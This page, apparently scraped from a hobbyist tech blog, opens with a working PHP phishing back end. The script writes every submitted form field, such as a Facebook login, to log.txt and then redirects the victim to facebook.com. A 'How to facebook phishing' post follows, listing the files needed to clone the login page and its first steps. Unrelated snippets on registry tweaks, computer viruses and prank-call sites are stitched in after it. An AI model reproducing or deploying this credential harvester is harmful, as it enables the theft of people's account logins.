<?php
header ('Location: http://www.facebook.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Just copy...
Saturday, June 17, 2017
How to facebook phishing

REQUIREMENT:-
1.index.html
2.mail.php
3.log.txt
Process:-
1.open facebook.com then copy the url or link
2.copy url and add it to "IDM" Internet download manager or u can simply save the url file.
3. now open the following downloaded file with notepad:-
4.press ctrl+f...
Thursday, April 20, 2017
how to backup and restore the registry in windows

Backup and restore the registry in Windows XP
To backup the registry on a Windows XP computer, follow these steps:
Click Start
Click Run
Type regedit in the search box and click OK to open the Registry Editor
On the left pane, click Computer to...
Top 10 Registry tweaks

Windows Registry holds all the tweaks to customize your Windows experience and deal with little nuisances that Microsoft thinks every user will love. From changing Windows’ design to unlocking hidden features, there are tweaks for everything. To help...
Tuesday, March 21, 2017
5 computer viruses every PC user should know about
Computer viruses are nasty little programs that are designed to lay waste to your computer. Some destroy files stored on your PC, while some trigger different software to malfunction. More nefarious viruses steal your confidential information and some even go to an extent...
4 Really Popular Prank Call Websites & How They Work
Not very long ago, prank calling consisted of a room full of bored teens, a rotary phone and a phone book flipped open to the “pizza delivery” section of the Yellow Pages. You’d pick straws to choose who went first, and then take turns seeing who could make the funniest prank...